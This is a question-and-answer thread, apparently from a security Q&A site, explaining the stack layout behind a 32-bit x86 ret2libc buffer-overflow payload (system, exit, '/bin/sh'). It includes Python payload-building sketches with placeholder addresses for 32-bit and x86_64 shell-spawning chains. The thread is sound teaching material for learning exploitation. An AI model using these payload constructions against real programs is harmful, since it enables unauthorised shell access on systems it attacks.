Understanding ret2libc return address location

Question

I recently was studying x86 buffer overflows + ret2libc attacks from https://www.ret2rop.com/2018/08/return-to-libc.html and I noticed the order is as follows:

bytes to fill buffer + address of system + return address for system/address of exit + address of "/bin/sh"

I am confused as to why the return address (where the PC/EIP returns to after calling and executing system's code) passed to system is located before the address of /bin/sh on the stack. From what I've read, the return address should come directly after /bin/sh, the argument to system, but every example I've seen follows this overflow order when using ret2libc attacks. Is there something I'm missing in how procedures/functions return, or where they return to? Why is the return address before /bin/sh and not after it inside the buffer-overflow payload?

plonk · Accepted Answer · 2020-11-26T10:04:00.510

This is because on x86 the stack grows downwards (towards lower addresses), while buffers are filled upwards (towards higher addresses).

When you write past the end of the buffer, you clobber the saved return address, which sits above the buffer at a higher address.

The ret instruction will then pop the return address off the stack and continue execution at the beginning of system. system does not pop its argument; it reads it in place, relative to the stack pointer. When system returns, its own ret pops the address of the next function off the stack. In other words, the stack shrinks as you go through the chain, and the stack pointer grows larger.

The reason that the address of /bin/sh can be passed on the stack lies in the calling convention used by gcc on 32-bit x86 Linux, which is very close to the System V calling convention (see Figure 3-15). In contrast, on x86_64 the first arguments are passed in registers (rdi, rsi, rdx, ...), so you would need a pop rdi; ret gadget before you can return to system.
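As a rough illustration of the x86_64 case, here is a minimal Python sketch of such a chain. Every address and the offset are made-up placeholders (assumptions, not values from any real binary or libc), and the function name is hypothetical. It only shows the ordering: the gadget address comes first, then the value the gadget pops into rdi, then system.

```python
import struct

# All values below are hypothetical placeholders, not taken from a real target.
POP_RDI_RET = 0x00000000004011D3  # assumed address of a `pop rdi; ret` gadget
BINSH_ADDR = 0x00007FFFF7F5A5AA   # assumed address of the "/bin/sh" string
SYSTEM_ADDR = 0x00007FFFF7E1A290  # assumed address of system()
OFFSET_TO_RET = 72                # assumed distance from buffer start to the saved return address


def build_chain_x86_64() -> bytes:
    """Pad up to the saved return address, then append the 64-bit chain."""
    chain = b"A" * OFFSET_TO_RET
    chain += struct.pack("<Q", POP_RDI_RET)  # the victim's ret jumps to the gadget
    chain += struct.pack("<Q", BINSH_ADDR)   # the gadget pops this value into rdi
    chain += struct.pack("<Q", SYSTEM_ADDR)  # the gadget's ret jumps to system
    return chain
```

Note that here the argument sits directly after the gadget address, because it is the gadget (not system) that consumes it from the stack.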

To understand the order of the values written to the stack, let's look at a single stack frame:

         high addresses

       +----------------+
       |                |
       | arguments      |
       |                |
       +----------------+
esp -> | return address |
       +----------------+
       |                |
       | locals         |
       |                |
       +----------------+

         low addresses

Putting this together into a payload, we get:

         high addresses

       +----------------+                -+
       | arg0           |                 |
       +----------------+                 | stack frame of system
       | return address | exit            |
       +----------------+                -+
esp -> | return address | system          |
       +----------------+                 |
       |                |  ^              | stack frame of victim
       | buffer         |  | overflow     |
       |                |  +              |
       + . . . . . . . .+                 :

         low addresses
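Read from low to high addresses, the diagram corresponds to the byte string below. This is a minimal sketch in Python; the three addresses and the offset are hypothetical placeholders (assumptions that depend entirely on the target binary and libc), and the function name is made up for illustration.

```python
import struct

# Hypothetical placeholder values; real ones depend on the target binary and libc.
SYSTEM_ADDR = 0xB7E42DA0  # assumed address of system()
EXIT_ADDR = 0xB7E369D0    # assumed address of exit()
BINSH_ADDR = 0xB7F63A0B   # assumed address of the "/bin/sh" string
OFFSET_TO_RET = 76        # assumed distance from buffer start to the saved return address


def build_payload_x86_32() -> bytes:
    """Lay out the payload in increasing address order, as in the diagram."""
    payload = b"A" * OFFSET_TO_RET             # fills the buffer up to the return address
    payload += struct.pack("<I", SYSTEM_ADDR)  # overwrites the victim's return address
    payload += struct.pack("<I", EXIT_ADDR)    # return address as seen by system
    payload += struct.pack("<I", BINSH_ADDR)   # arg0 of system, one slot above its return address
    return payload
```

The exit address lands between system and /bin/sh because, from the point of view of system, it occupies the return-address slot that a normal call instruction would have pushed.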

The buffer being overflowed is a local buffer in the victim function, and the victim's return address gets overwritten. The victim's ret instruction will pop that return address off the stack into eip, so execution will continue in system.

Once execution has reached system, the stack looks like this, with the space below esp usable by system for its locals. (The diagram is a simplification: as system pushes locals, esp decreases instead of staying on the return address.)

         high addresses

       +----------------+                -+
       | arg0           |                 |
       +----------------+                 | stack frame of system
esp -> | return address | exit            |
       +----------------+                 |
       |                |                 |
       | locals         |                 |
       |                |                 |
       + . . . . . . . .+                 :

         low addresses

To access its argument, system uses the [reg+displacement] addressing mode; at function entry the argument is at [esp+4]. At the end of its execution, it executes ret, which continues execution in exit.
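The walk through the chain can be replayed with a toy model. The Python sketch below is only a simulation under simplifying assumptions: the stack is a dictionary, the stack address is a hypothetical placeholder, and symbolic labels stand in for the real addresses. It models ret as eip <- [esp]; esp <- esp + 4 and records what system sees on entry.

```python
def ret(stack: dict, esp: int) -> tuple:
    """Model the x86 `ret` instruction: eip <- [esp]; esp <- esp + 4."""
    eip = stack[esp]
    return eip, esp + 4


# Hypothetical stack address of the victim's overwritten return address.
ESP_AT_VICTIM_RET = 0xBFFFF0CC

# Symbolic labels stand in for the real 32-bit addresses in the payload.
stack = {
    ESP_AT_VICTIM_RET: "system",
    ESP_AT_VICTIM_RET + 4: "exit",
    ESP_AT_VICTIM_RET + 8: "/bin/sh",
}


def run_chain() -> dict:
    """Replay the two `ret` instructions of the chain."""
    eip, esp = ret(stack, ESP_AT_VICTIM_RET)  # the victim returns into system
    on_entry = {
        "eip": eip,
        "return_address": stack[esp],  # [esp] on entry to system
        "arg0": stack[esp + 4],        # [esp+4] on entry to system
    }
    eip, esp = ret(stack, esp)         # system returns
    return {"on_entry_to_system": on_entry, "eip_after_system": eip}
```

In this model, on entry to system the slot at [esp] holds exit and the slot at [esp+4] holds /bin/sh, which is why the payload places exit before /bin/sh.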

edited Nov 26 '20 at 10:04

answered Nov 26 '20 at 07:58

`Then, system will pop its arguments off the stack ` Confuses me a bit, could you explain this a bit more? – asd_665 Nov 26 '20 at 08:15
sure! I'll expand my answer. – plonk Nov 26 '20 at 08:16
What confuses me is the order in which `system` `pop`s arguments off the stack, is the `return address` for `exit` popped first? Or should arguments be passed in reverse order? Does this apply to every function/procedure? – asd_665 Nov 26 '20 at 08:20
I understand for instance when calling `printf` from `assembly` you would need to first `push` the string you wish to print to `stdout` first then `push` the `format string specifier` string onto the stack, to be popped in the correct order by `printf`. I just don't understand how this applies to `return` addresses logically/in the logic of the payload. – asd_665 Nov 26 '20 at 08:27
Why isn't `system` treating the `return address` of `exit` as the first argument? If `pop` increases the stack pointer after the overflown `return address` with address of `system` is called shouldn't the argument be the `return address` to exit and not the `/bin/sh` memory address? I just don't understand why the payload is `<system> + <exit> + <'/bin/sh'>` and not `<system> + <'/bin/sh'> + <exit>` – asd_665 Nov 26 '20 at 08:45
I'm still confused as to why `exit` is before `/bin/sh` in the payload and not vice versa. – asd_665 Nov 26 '20 at 08:57
The issue is how confusing this is and also that the exploit works using the format `<system> + <exit> + <'/bin/sh'>` but doesn't work when using `<system> + <'/bin/sh'> + <exit>` so I think we're missing something. – asd_665 Nov 26 '20 at 09:07
yes - I think I messed something up in my answer - I got the stack frames the wrong way around. Let me correct that... – plonk Nov 26 '20 at 09:07
@asd_665 Thanks for pointing that out - seems like the same thing confused me for a moment! It's been a while since I've looked at the 32 bit stuff. I've deleted my misleading comments here - does the last edit clear things up a bit? – plonk Nov 26 '20 at 09:27
In your answer can you explain the second diagram in `x86` to make it clear and concise what is happening with `eip` and the `return address`es, according to your diagrams. – asd_665 Nov 26 '20 at 09:36
Why do the two return addresses in diagram 2 have to be adjacent/directly located by each other? How does `eip` know where to return to within `system`? Is that logic performed by the `[esp+4]` instruction? – asd_665 Nov 26 '20 at 10:15
at the entry to `system`, the stack pointer `esp` points to the return address. While `system` executes it can decrease `esp` as it pushes locals to the stack, but needs to pop all of them again before it exits, so `esp` will point to the return address again when the `ret` instruction is executed. The `ret` instruction is equivalent to `eip <- [esp]; esp <- esp + 4`. After the `ret`, the stack pointer will therefore point to the next return address. – plonk Nov 26 '20 at 10:24
You really helped me understand how functions like `gets` and `system` access arguments on the stack! Hopefully others who were confused find this answer! – asd_665 Nov 26 '20 at 10:30
